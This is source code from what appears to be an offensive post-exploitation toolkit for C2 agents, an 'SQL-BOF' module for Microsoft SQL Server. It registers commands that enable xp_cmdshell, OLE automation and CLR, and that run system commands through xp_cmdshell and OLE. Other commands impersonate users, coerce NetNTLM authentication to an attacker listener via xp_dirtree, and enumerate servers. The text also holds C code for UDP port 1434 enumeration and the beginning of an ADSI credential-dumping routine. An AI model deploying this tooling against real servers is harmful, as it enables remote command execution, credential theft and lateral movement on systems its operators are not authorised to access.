_cmd_disableole.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_disableole.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_disableole.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_disableole.addArgString("server", true, "SQL server to connect to");
_cmd_disableole.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "Ole Automation Procedures", "0", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Disable OLE Automation";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_disablerpc = ax.create_command("disablerpc", "Disable RPC and RPC out on a linked server", "mssql disablerpc [-d database] [-i impersonate] [-u user] [-p password] [server] [linkedserver]");
_cmd_disablerpc.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_disablerpc.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_disablerpc.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_disablerpc.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_disablerpc.addArgString("server", true, "SQL server to connect to");
_cmd_disablerpc.addArgString("linkedserver", true, "Linked server name");
_cmd_disablerpc.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let linkedserver = parsed_json["linkedserver"];
    let database     = parsed_json["database"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "rpc", "FALSE", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Disable RPC on linked server";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_disablexp = ax.create_command("disablexp", "Disable xp_cmdshell", "mssql disablexp [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_disablexp.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_disablexp.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_disablexp.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_disablexp.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_disablexp.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_disablexp.addArgString("server", true, "SQL server to connect to");
_cmd_disablexp.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "xp_cmdshell", "0", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Disable xp_cmdshell";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_enableclr = ax.create_command("enableclr", "Enable CLR integration", "mssql enableclr [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_enableclr.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_enableclr.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_enableclr.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_enableclr.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_enableclr.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_enableclr.addArgString("server", true, "SQL server to connect to");
_cmd_enableclr.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "clr enabled", "1", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Enable CLR integration";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_enableole = ax.create_command("enableole", "Enable OLE Automation Procedures", "mssql enableole [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_enableole.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_enableole.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_enableole.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_enableole.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_enableole.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_enableole.addArgString("server", true, "SQL server to connect to");
_cmd_enableole.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "Ole Automation Procedures", "1", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Enable OLE Automation Procedures";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_enablerpc = ax.create_command("enablerpc", "Enable RPC and RPC out on a linked server", "mssql enablerpc [-d database] [-i impersonate] [-u user] [-p password] [server] [linkedserver]");
_cmd_enablerpc.addArgFlagString("-d", "database",    "Optional: Database to use", "");
_cmd_enablerpc.addArgFlagString("-i", "impersonate", "Optional: User to impersonate during execution", "");
_cmd_enablerpc.addArgFlagString("-u", "user",        "Optional: SQL username for SQL authentication", "");
_cmd_enablerpc.addArgFlagString("-p", "password",    "Optional: SQL password for SQL authentication", "");
_cmd_enablerpc.addArgString("server",       true, "SQL server to connect to");
_cmd_enablerpc.addArgString("linkedserver", true, "Linked server name");
_cmd_enablerpc.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server      = parsed_json["server"];
    let linkedserver= parsed_json["linkedserver"];
    let database    = parsed_json["database"];
    let impersonate = parsed_json["impersonate"];
    let user        = parsed_json["user"];
    let password    = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "rpc", "TRUE", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Enable RPC on linked server";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_enablexp = ax.create_command("enablexp", "Enable xp_cmdshell", "mssql enablexp [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_enablexp.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_enablexp.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_enablexp.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_enablexp.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_enablexp.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_enablexp.addArgString("server", true, "SQL server to connect to");
_cmd_enablexp.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, "xp_cmdshell", "1", user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/togglemodule." + ax.arch(id) + ".o";
    let message = "Task: Enable xp_cmdshell";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_impersonate = ax.create_command("impersonate", "Enumerate users that can be impersonated", "mssql impersonate [-d database] [-u user] [-p password] [server]");
_cmd_impersonate.addArgFlagString("-d", "database", "Optional: Database to use", "");
_cmd_impersonate.addArgFlagString("-u", "user",     "Optional: SQL username for SQL authentication", "");
_cmd_impersonate.addArgFlagString("-p", "password", "Optional: SQL password for SQL authentication", "");
_cmd_impersonate.addArgString("server", true, "SQL server to connect to");
_cmd_impersonate.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server   = parsed_json["server"];
    let database = parsed_json["database"];
    let user     = parsed_json["user"];
    let password = parsed_json["password"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr", [server, database, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/impersonate." + ax.arch(id) + ".o";
    let message = "Task: SQL Server impersonation enumeration";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_info = ax.create_command("info", "Gather information about the SQL Server", "mssql info [-d database] [-u user] [-p password] [server]");
_cmd_info.addArgFlagString("-d", "database", "Optional: Database to use", "");
_cmd_info.addArgFlagString("-u", "user",     "Optional: SQL username for SQL authentication", "");
_cmd_info.addArgFlagString("-p", "password", "Optional: SQL password for SQL authentication", "");
_cmd_info.addArgString("server", true, "SQL server to connect to");
_cmd_info.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server   = parsed_json["server"];
    let database = parsed_json["database"];
    let user     = parsed_json["user"];
    let password = parsed_json["password"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr", [server, database, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/info." + ax.arch(id) + ".o";
    let message = "Task: SQL Server impersonation enumeration";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_links = ax.create_command("links", "Enumerate linked servers", "mssql links [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_links.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_links.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_links.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_links.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_links.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_links.addArgString("server", true, "SQL server to connect to");
_cmd_links.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/links." + ax.arch(id) + ".o";
    let message = "Task: Enumerate linked servers";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_olecmd = ax.create_command("olecmd", "Execute a system command using OLE automation procedures", "mssql olecmd [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [command]");
_cmd_olecmd.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_olecmd.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_olecmd.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_olecmd.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_olecmd.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_olecmd.addArgString("server",  true, "SQL server to connect to");
_cmd_olecmd.addArgString("command", true, "System command to execute via OLE automation");
_cmd_olecmd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let command      = parsed_json["command"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, command, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/olecmd." + ax.arch(id) + ".o";
    let message = "Task: Execute command via OLE automation";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_query = ax.create_command("query", "Execute a custom SQL query", "mssql query [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [query]");
_cmd_query.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_query.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_query.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_query.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_query.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_query.addArgString("server", true, "SQL server to connect to");
_cmd_query.addArgString("query",  true, "Query to execute");
_cmd_query.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let query        = parsed_json["query"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, query, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/query." + ax.arch(id) + ".o";
    let message = "Task: SQL Server custom query execution";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_rows = ax.create_command("rows", "Get the count of rows in a table", "mssql rows [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [table]");
_cmd_rows.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_rows.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_rows.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_rows.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_rows.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_rows.addArgString("server", true, "SQL server to connect to");
_cmd_rows.addArgString("table",  true, "Table to count rows from");
_cmd_rows.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let table        = parsed_json["table"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, table, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/rows." + ax.arch(id) + ".o";
    let message =  "Task: Count rows in table";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_search = ax.create_command("search","Search a table for a column name","mssql search [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [keyword]");
_cmd_search.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_search.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_search.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_search.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_search.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_search.addArgString("server",  true, "SQL server to connect to");
_cmd_search.addArgString("keyword", true, "Column name keyword to search for");
_cmd_search.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let keyword      = parsed_json["keyword"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, keyword, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/search." + ax.arch(id) + ".o";
    let message =  "Task: Search for column names";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_smb = ax.create_command("smb", "Coerce NetNTLM auth via xp_dirtree", "mssql smb [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [\\\\listener]");
_cmd_smb.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_smb.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_smb.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_smb.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_smb.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_smb.addArgString("server",   true, "SQL server to connect to");
_cmd_smb.addArgString("listener", true, "UNC path listener (e.g., \\\\host\\share)");
_cmd_smb.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let listener = parsed_json["listener"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, listener, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/smb." + ax.arch(id) + ".o";
    let message = "Task: SQL Server SMB relay via xp_dirtree";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_tables = ax.create_command("tables", "Enumerate tables within a database", "mssql tables [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_tables.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_tables.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_tables.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_tables.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_tables.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_tables.addArgString("server", true, "SQL server to connect to");
_cmd_tables.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/tables." + ax.arch(id) + ".o";
    let message = "Task: Enumerate Tables";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_users = ax.create_command("users", "Enumerate users with database access","mssql users [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_users.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_users.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_users.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_users.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_users.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_users.addArgString("server", true, "SQL server to connect to");
_cmd_users.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/users." + ax.arch(id) + ".o";
    let message = "Task: Enumerate users with database access";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_whoami = ax.create_command("whoami", "Gather logged in user, mapped user and roles from SQL server", "mssql whoami [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server]");
_cmd_whoami.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_whoami.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_whoami.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_whoami.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_whoami.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_whoami.addArgString("server", true, "SQL server to connect to");
_cmd_whoami.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, user, password]);
    let bof_path = ax.script_dir() + "_bin/SQL/whoami." + ax.arch(id) + ".o";
    let message = "Task: SQL Server whoami BOF";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var _cmd_xpcmd = ax.create_command("xpcmd", "Execute a system command via xp_cmdshell", "mssql xpcmd [-d database] [-l linkedserver] [-i impersonate] [-u user] [-p password] [server] [command]");
_cmd_xpcmd.addArgFlagString("-d", "database",     "Optional: Database to use", "");
_cmd_xpcmd.addArgFlagString("-l", "linkedserver", "Optional: Execute through linked server", "");
_cmd_xpcmd.addArgFlagString("-i", "impersonate",  "Optional: User to impersonate during execution", "");
_cmd_xpcmd.addArgFlagString("-u", "user",         "Optional: SQL username for SQL authentication", "");
_cmd_xpcmd.addArgFlagString("-p", "password",     "Optional: SQL password for SQL authentication", "");
_cmd_xpcmd.addArgString("server",  true, "SQL server to connect to");
_cmd_xpcmd.addArgString("command", true, "Command to execute via xp_cmdshell");
_cmd_xpcmd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let server       = parsed_json["server"];
    let command      = parsed_json["command"];
    let database     = parsed_json["database"];
    let linkedserver = parsed_json["linkedserver"];
    let impersonate  = parsed_json["impersonate"];
    let user         = parsed_json["user"];
    let password     = parsed_json["password"];

    let bof_params = ax.bof_pack( "cstr,cstr,cstr,cstr,cstr,cstr,cstr", [server, database, linkedserver, impersonate, command, user, password] );
    let bof_path = ax.script_dir() + "_bin/SQL/xpcmd." + ax.arch(id) + ".o";
    let message = "Task: SQL Server xp_cmdshell execution";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



var cmd_mssql = ax.create_command("mssql", "Microsoft SQL Server BOF");
cmd_mssql.addSubCommands([_cmd_1434udp, _cmd_adsi, _cmd_agentcmd, _cmd_agentstatus, _cmd_checkrpc, _cmd_clr, _cmd_columns, _cmd_databases, _cmd_disableclr,
    _cmd_disableole, _cmd_disablerpc, _cmd_disablexp, _cmd_enableclr, _cmd_enableole, _cmd_enablerpc, _cmd_enablexp, _cmd_impersonate, _cmd_info, _cmd_links,
    _cmd_olecmd, _cmd_query, _cmd_rows, _cmd_search, _cmd_smb, _cmd_tables, _cmd_users, _cmd_whoami, _cmd_xpcmd
]);

var group_sql = ax.create_commands_group("SQL-BOF", [cmd_mssql]);
ax.register_commands_group(group_sql, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/1434udp/entry.c
================================================
#include "bofdefs.h"
#include "base.c"

void UdpEnumInfo(char* serverIp)
{
	int port = 1434;
	int timeout = 1000;
    WSADATA wsaData;
    SOCKET udpSocket = INVALID_SOCKET;
    struct sockaddr_in serverAddr;
    char sendBuffer[1] = { 0x02 };
    char recvBuffer[1024];
    int recvBufferLen = sizeof(recvBuffer);
    int serverAddrLen = sizeof(serverAddr);
    char* response = NULL;

    if (WS2_32$WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        internal_printf("WSAStartup failed with error: %d\n", WS2_32$WSAGetLastError());
        return;
    }

    udpSocket = WS2_32$socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (udpSocket == INVALID_SOCKET) {
        internal_printf("Socket creation failed with error: %d\n", WS2_32$WSAGetLastError());
        goto END;
    }

    if (WS2_32$setsockopt(udpSocket, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) {
        internal_printf("Failed to set receive timeout: %d\n", WS2_32$WSAGetLastError());
        goto END;
    }

    if (WS2_32$setsockopt(udpSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) {
        internal_printf("Failed to set send timeout: %d\n", WS2_32$WSAGetLastError());
        goto END;
    }

    intZeroMemory(&serverAddr, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = WS2_32$htons(port);
    if (WS2_32$inet_pton(AF_INET, serverIp, &serverAddr.sin_addr) != 1) {
        internal_printf("Invalid server IP address.\n");
        goto END;
    }

    if (WS2_32$sendto(udpSocket, sendBuffer, sizeof(sendBuffer), 0, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {
        internal_printf("Failed to send request: %d\n", WS2_32$WSAGetLastError());
        goto END;
    }

    int bytesReceived = WS2_32$recvfrom(udpSocket, recvBuffer, recvBufferLen - 1, 0, (struct sockaddr*)&serverAddr, &serverAddrLen);
    if (bytesReceived == SOCKET_ERROR) {
        internal_printf("Failed to receive response: %d\n", WS2_32$WSAGetLastError());
        goto END;
    }

    recvBuffer[bytesReceived] = '\0';

    response = intAlloc(bytesReceived + 1);
    if (response == NULL) {
        internal_printf("Memory allocation failed.\n");
        goto END;
    }

    int responseIndex = 0;
	for (int i = 0; i < bytesReceived; ++i) {
		if (recvBuffer[i] >= 32 && recvBuffer[i] <= 126) {
			response[responseIndex++] = recvBuffer[i];
		}
	}
    response[responseIndex] = '\0';

	if (response != NULL) {
        internal_printf("SQL Server Connection Info:\n\n%s\n", response);
        intFree(response);
    } else {
        internal_printf("Failed to retrieve SQL Server info.\n");
    }

END:
	if (udpSocket != INVALID_SOCKET) {
    	WS2_32$closesocket(udpSocket);
	}
    WS2_32$WSACleanup();
}


VOID go( IN PCHAR Buffer, IN ULONG Length )
{
	char* ip;

	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	
	ip = BeaconDataExtract(&parser, NULL);

	ip = *ip == 0 ? NULL : ip;
	
	if(!bofstart())
		return;

	if (ip == NULL)
	{
		internal_printf("[!] IP argument is required\n");
		printoutput(TRUE);
		return;
	}
	
	UdpEnumInfo(ip);

	printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/adsi/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "ldapserver.h"
#include "sql.c"
#include "sql_clr.c"
#include "sql_modules.c"
#include <pthread.h>

typedef struct ThreadData {
  SQLHSTMT stmt;
  char *function;
  char *port;
  char *link;
  char *impersonate;
} ThreadData;

void *RunThreadedQuery(LPVOID threadData) {
  ThreadData *data = (ThreadData *)threadData;

  char *prefix = "SELECT dbo.";
  char *middle = "(";
  char *suffix = ");";

  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(data->function) + MSVCRT$strlen(middle) + MSVCRT$strlen(data->port) + MSVCRT$strlen(suffix) + 1;
  char *query = (char *)intAlloc(totalSize);

  MSVCRT$strcpy(query, prefix);
  MSVCRT$strncat(query, data->function, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, middle, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, data->port, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

  HandleQuery(data->stmt, (SQLCHAR *)query, data->link, data->impersonate, FALSE);

  intFree(query);
}

void DumpAdsiCreds(char *server, char *database, char *link, char *impersonate, char *adsiServer, char *port, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  //
  // non-standard, for the duplicate connection
  //
  SQLHENV env2 = NULL;
  SQLHSTMT stmt2 = NULL;
  SQLHDBC dbc2 = NULL;
  char *trigger = NULL;

  InitRandomSeed();
  char *dllPath = GenerateRandomString(8);
  char *function = GenerateRandomString(8);
  char *assemblyName = "ldapServer";

  if (link == NULL) {
